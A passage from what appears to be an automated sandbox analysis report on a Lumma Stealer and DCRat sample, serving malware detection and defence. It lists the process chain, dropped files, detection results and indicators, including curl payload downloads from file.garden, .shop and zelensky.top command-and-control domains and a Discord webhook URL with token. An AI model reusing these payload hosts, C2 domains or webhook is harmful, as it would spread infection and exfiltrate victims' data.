                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeQueries volume information: C:\Users\user\AppData\Local\WmiPrvSE.exe VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeQueries volume information: C:\Users\user\AppData\Local\WmiPrvSE.exe VolumeInformation
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662D7DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF78662D7DC
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0060B146 GetVersionExW,5_2_0060B146
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: seoI30IZZr.exe, seoI30IZZr.exe, 00000000.00000000.1439614504.00007FF786630000.00000002.00000001.01000000.00000003.sdmp, seoI30IZZr.exe, 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ollydbg.exe
                                Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: 00000010.00000002.1726451234.0000000012879000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 4900, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 5656, type: MEMORYSTR
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: 5.3.kdmapper.exe.530c6cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.69bb6cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.0.msedge.exe.120000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.530c6cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.69bb6cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000005.00000003.1497197770.000000000696D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.1497756532.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000000.1654958130.0000000000122000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\WmiPrvSE.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                Source: Yara matchFile source: 5.3.kdmapper.exe.530c6cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.69bb6cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.0.msedge.exe.120000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.530c6cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.69bb6cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\WmiPrvSE.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 00000010.00000002.1726451234.0000000012879000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 4900, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 5656, type: MEMORYSTR
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: 5.3.kdmapper.exe.530c6cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.69bb6cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.0.msedge.exe.120000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.530c6cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.69bb6cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000005.00000003.1497197770.000000000696D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.1497756532.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000000.1654958130.0000000000122000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\WmiPrvSE.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                Source: Yara matchFile source: 5.3.kdmapper.exe.530c6cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.69bb6cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.0.msedge.exe.120000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.530c6cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.69bb6cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\WmiPrvSE.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information11
                                Scripting
                                Valid Accounts111
                                Windows Management Instrumentation
                                11
                                Scripting
                                1
                                DLL Side-Loading
                                11
                                Disable or Modify Tools
                                21
                                Input Capture
                                1
                                System Time Discovery
                                1
                                Taint Shared Content
                                11
                                Archive Collected Data
                                1
                                Ingress Tool Transfer
                                Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts1
                                Native API
                                1
                                DLL Side-Loading
                                411
                                Process Injection
                                111
                                Deobfuscate/Decode Files or Information
                                LSASS Memory3
                                File and Directory Discovery
                                Remote Desktop Protocol1
                                Screen Capture
                                11
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution
                                21
                                Registry Run Keys / Startup Folder
                                21
                                Registry Run Keys / Startup Folder
                                4
                                Obfuscated Files or Information
                                Security Account Manager37
                                System Information Discovery
                                SMB/Windows Admin Shares21
                                Input Capture
                                2
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts3
                                Command and Scripting Interpreter
                                Login HookLogin Hook3
                                Software Packing
                                NTDS561
                                Security Software Discovery
                                Distributed Component Object Model3
                                Clipboard Data
                                113
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts1
                                PowerShell
                                Network Logon ScriptNetwork Logon Script1
                                DLL Side-Loading
                                LSA Secrets241
                                Virtualization/Sandbox Evasion
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                File Deletion
                                Cached Domain Credentials2
                                Process Discovery
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items132
                                Masquerading
                                DCSync1
                                Application Window Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                                Virtualization/Sandbox Evasion
                                Proc Filesystem1
                                Remote System Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                                Process Injection
                                /etc/passwd and /etc/shadow1
                                System Network Configuration Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522824 Sample: seoI30IZZr.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 130 zelensky.top 2->130 132 tiddymarktwo.shop 2->132 134 10 other IPs or domains 2->134 142 Suricata IDS alerts for network traffic 2->142 144 Found malware configuration 2->144 146 Antivirus detection for URL or domain 2->146 148 18 other signatures 2->148 12 seoI30IZZr.exe 2 2->12         started        15 msedge.exe 2->15         started        18 cmd.exe 2->18         started        20 3 other processes 2->20 signatures3 process4 file5 186 Tries to detect sandboxes and other dynamic analysis tools (window names) 12->186 188 Drops executables to the windows directory (C:\Windows) and starts them 12->188 190 Hides threads from debuggers 12->190 192 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 12->192 22 kdmapper.exe 3 6 12->22         started        26 physmeme.exe 2 12->26         started        28 cmd.exe 1 12->28         started        36 2 other processes 12->36 122 C:\Users\user\Desktop\oYbYVUjG.log, PE32 15->122 dropped 124 C:\Users\user\Desktop\mOEXVCEF.log, PE32 15->124 dropped 126 C:\Users\user\Desktop\OJAsYAeC.log, PE32 15->126 dropped 128 3 other malicious files 15->128 dropped 30 cmd.exe 15->30         started        194 Uses ping.exe to sleep 18->194 32 conhost.exe 18->32         started        34 chcp.com 18->34         started        38 2 other processes 18->38 40 2 other processes 20->40 signatures6 process7 file8 118 C:dge\msedge.exe, PE32 22->118 dropped 120 C:dge\L6lFlVnd0szYUYb26bZc.vbe, data 22->120 dropped 158 Antivirus detection for dropped file 22->158 160 Multi AV Scanner detection for dropped file 22->160 162 Machine Learning detection for dropped file 22->162 42 wscript.exe 1 22->42         started        164 Contains functionality to inject code into remote processes 26->164 166 Writes to foreign memory regions 26->166 168 Allocates memory in foreign processes 26->168 174 2 other signatures 26->174 45 RegAsm.exe 26->45         started        47 RegAsm.exe 26->47         started        50 conhost.exe 26->50         started        170 Uses ping.exe to sleep 28->170 172 Uses ping.exe to check the status of other devices and networks 28->172 52 curl.exe 2 28->52         started        61 3 other processes 30->61 55 curl.exe 2 36->55         started        57 conhost.exe 36->57         started        59 cvtres.exe 36->59         started        signatures9 process10 dnsIp11 182 Windows Scripting host queries suspicious COM object (likely to drop second stage) 42->182 184 Suspicious execution chain found 42->184 63 cmd.exe 1 42->63         started        65 conhost.exe 45->65         started        67 cvtres.exe 45->67         started        136 steamcommunity.com 104.102.49.254, 443, 49710 AKAMAI-ASUS United States 47->136 138 file.garden 188.114.96.3, 443, 49706, 49709 CLOUDFLARENETUS European Union 52->138 140 127.0.0.1 unknown unknown 52->140 106 C:\Windows\Speech\kdmapper.exe, PE32 52->106 dropped 108 C:\Windows\Speech\physmeme.exe, PE32 55->108 dropped file12 signatures13 process14 process15 69 msedge.exe 6 26 63->69         started        73 conhost.exe 63->73         started        75 conhost.exe 63->75         started        file16 110 C:\Users\user\Desktop\rWfFWfLI.log, PE32 69->110 dropped 112 C:\Users\user\Desktop\jsWPmlvb.log, PE32 69->112 dropped 114 C:\Users\user\Desktop\KiGKqBgX.log, PE32 69->114 dropped 116 5 other malicious files 69->116 dropped 150 Antivirus detection for dropped file 69->150 152 Multi AV Scanner detection for dropped file 69->152 154 Creates an undocumented autostart registry key 69->154 156 4 other signatures 69->156 77 cmd.exe 69->77         started        80 csc.exe 69->80         started        83 csc.exe 69->83         started        85 2 other processes 69->85 signatures17 process18 file19 196 Uses ping.exe to sleep 77->196 87 WmiPrvSE.exe 77->87         started        90 conhost.exe 77->90         started        92 chcp.com 77->92         started        94 PING.EXE 77->94         started        102 C:\Program Files (x86)\...\msedge.exe, PE32 80->102 dropped 198 Infects executable files (exe, dll, sys, html) 80->198 104 C:\Windows\...\SecurityHealthSystray.exe, PE32 83->104 dropped 200 Loading BitLocker PowerShell Module 85->200 96 conhost.exe 85->96         started        98 conhost.exe 85->98         started        100 WmiPrvSE.exe 85->100         started        signatures20 process21 signatures22 176 Antivirus detection for dropped file 87->176 178 Multi AV Scanner detection for dropped file 87->178 180 Machine Learning detection for dropped file 87->180

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                seoI30IZZr.exe55%ReversingLabsWin64.Spyware.Lummastealer
                                seoI30IZZr.exe100%AviraHEUR/AGEN.1317356
                                seoI30IZZr.exe100%Joe Sandbox ML
                                SourceDetectionScannerLabelLink
                                C:\Edge\L6lFlVnd0szYUYb26bZc.vbe100%AviraVBS/Runner.VPG
                                C:\Windows\Speech\kdmapper.exe100%AviraVBS/Runner.VPG
                                C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat100%AviraBAT/Delbat.C
                                C:\Edge\msedge.exe100%AviraHEUR/AGEN.1323342
                                C:\Users\user\Desktop\AznuGYbp.log100%AviraTR/AVI.Agent.updqb
                                C:\Users\user\AppData\Local\Temp\FVbPldJoKd.bat100%AviraBAT/Delbat.C
                                C:\Users\user\Desktop\KiGKqBgX.log100%AviraTR/PSW.Agent.qngqt
                                C:\Users\user\Desktop\EagcoYZU.log100%AviraTR/AVI.Agent.updqb
                                C:\Users\user\Desktop\OJAsYAeC.log100%AviraTR/PSW.Agent.qngqt
                                C:\Users\user\AppData\Local\WmiPrvSE.exe100%AviraHEUR/AGEN.1323342
                                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                                C:\Windows\Speech\kdmapper.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\oYbYVUjG.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\jsWPmlvb.log100%Joe Sandbox ML
                                C:\Edge\msedge.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\mOEXVCEF.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\KiGKqBgX.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\OJAsYAeC.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\rWfFWfLI.log100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\WmiPrvSE.exe100%Joe Sandbox ML
                                C:\Edge\msedge.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\AppData\Local\WmiPrvSE.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\AznuGYbp.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\ERJdElGX.log29%ReversingLabs
                                C:\Users\user\Desktop\EagcoYZU.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\IlfCUBRc.log29%ReversingLabs
                                C:\Users\user\Desktop\KiGKqBgX.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\OJAsYAeC.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\jsWPmlvb.log8%ReversingLabs
                                C:\Users\user\Desktop\mOEXVCEF.log8%ReversingLabs
                                C:\Users\user\Desktop\oYbYVUjG.log25%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\Desktop\rWfFWfLI.log25%ReversingLabsWin32.Trojan.Generic
                                C:\Windows\Speech\kdmapper.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Windows\Speech\physmeme.exe61%ReversingLabsByteCode-MSIL.Trojan.LummaStealer
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                https://player.vimeo.com0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/0%URL Reputationsafe
                                https://contoso.com/License0%URL Reputationsafe
                                https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                                https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                                https://medal.tv0%URL Reputationsafe
                                https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
                                https://contoso.com/0%URL Reputationsafe
                                https://nuget.org/nuget.exe0%URL Reputationsafe
                                https://login.steampowered.com/0%URL Reputationsafe
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                https://steam.tv/0%URL Reputationsafe
                                http://nuget.org/NuGet.exe0%URL Reputationsafe
                                https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
                                https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
                                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                                https://contoso.com/Icon0%URL Reputationsafe
                                https://recaptcha.net0%URL Reputationsafe
                                https://store.steampowered.com/0%URL Reputationsafe
                                https://lv.queniujq.cn0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
                                http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                                https://checkout.steampowered.com/0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
                                https://help.steampowered.com/0%URL Reputationsafe
                                https://api.steampowered.com/0%URL Reputationsafe
                                https://aka.ms/pscore680%URL Reputationsafe
                                https://store.steampowered.com/;0%URL Reputationsafe
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                steamcommunity.com
                                104.102.49.254
                                truefalse
                                  unknown
                                  file.garden
                                  188.114.96.3
                                  truefalse
                                    unknown
                                    fossillargeiw.shop
                                    unknown
                                    unknowntrue
                                      unknown
                                      strappystyio.shop
                                      unknown
                                      unknowntrue
                                        unknown
                                        tiddymarktwo.shop
                                        unknown
                                        unknowntrue
                                          unknown
                                          coursedonnyre.shop
                                          unknown
                                          unknowntrue
                                            unknown
                                            captainynfanw.shop
                                            unknown
                                            unknowntrue
                                              unknown
                                              tearrybyiwo.shop
                                              unknown
                                              unknowntrue
                                                unknown
                                                zelensky.top
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  surveriysiop.shop
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    appleboltelwk.shop
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      tendencerangej.shop
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        NameMaliciousAntivirus DetectionReputation
                                                        coursedonnyre.shoptrue
                                                          unknown
                                                          https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binfalse
                                                            unknown
                                                            strappystyio.shoptrue
                                                              unknown
                                                              tearrybyiwo.shoptrue
                                                                unknown
                                                                https://steamcommunity.com/profiles/76561199724331900true
                                                                • URL Reputation: malware
                                                                unknown
                                                                https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binfalse
                                                                  unknown
                                                                  captainynfanw.shoptrue
                                                                    unknown
                                                                    fossillargeiw.shoptrue
                                                                      unknown
                                                                      tiddymarktwo.shoptrue
                                                                        unknown
                                                                        surveriysiop.shoptrue
                                                                          unknown
                                                                          appleboltelwk.shoptrue
                                                                            unknown
                                                                            tendencerangej.shoptrue
                                                                              unknown
                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                              https://player.vimeo.comRegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://steamcommunity.com/profiles/76561199724331900%RegAsm.exe, 0000000C.00000002.1538876694.000000000132A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  unknown
                                                                                  http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000020.00000002.1965574807.00000251FDFE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://community.akamai.steamstatic.com/RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://contoso.com/Licensepowershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://www.gstatic.cn/recaptcha/RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 0000000C.00000002.1538540291.00000000012FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://recaptcha.net/recaptcha/;RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binbth.dllcurl.exe, 00000004.00000002.1492818711.0000019B0A2AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://www.youtube.comRegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://www.google.comRegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://community.akamai.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&amp;l=engliRegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://medal.tvRegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://broadcast.st.dl.eccdnx.comRegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://zelensky.topmsedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://contoso.com/powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwOseoI30IZZr.exefalse
                                                                                                unknown
                                                                                                https://nuget.org/nuget.exepowershell.exe, 0000001F.00000002.1911610338.000001D6B02F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://strappystyio.shop/api=RegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://auth.gg/seoI30IZZr.exefalse
                                                                                                    unknown
                                                                                                    http://crl.micft.cMicRosofpowershell.exe, 00000020.00000002.1969358434.00000251FE250000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://zelensky.top/msedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.phpmsedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://s.ytimg.com;RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://login.steampowered.com/RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsedge.exe, 00000010.00000002.1710778572.0000000002DD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1759033398.000001D6A0281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E5DF1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:curl.exe, 00000007.00000002.1509267564.000001B321110000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://steam.tv/RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://www.houseindustries.com/licenseseoI30IZZr.exefalse
                                                                                                                unknown
                                                                                                                http://www.houseindustries.com/licenseBurbankseoI30IZZr.exefalse
                                                                                                                  unknown
                                                                                                                  http://nuget.org/NuGet.exepowershell.exe, 0000001F.00000002.1911610338.000001D6B02F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishRegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://www.houseindustries.comhttp://www.talleming.comHouseseoI30IZZr.exefalse
                                                                                                                    unknown
                                                                                                                    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englRegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000001F.00000002.1759033398.000001D6A04A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      unknown
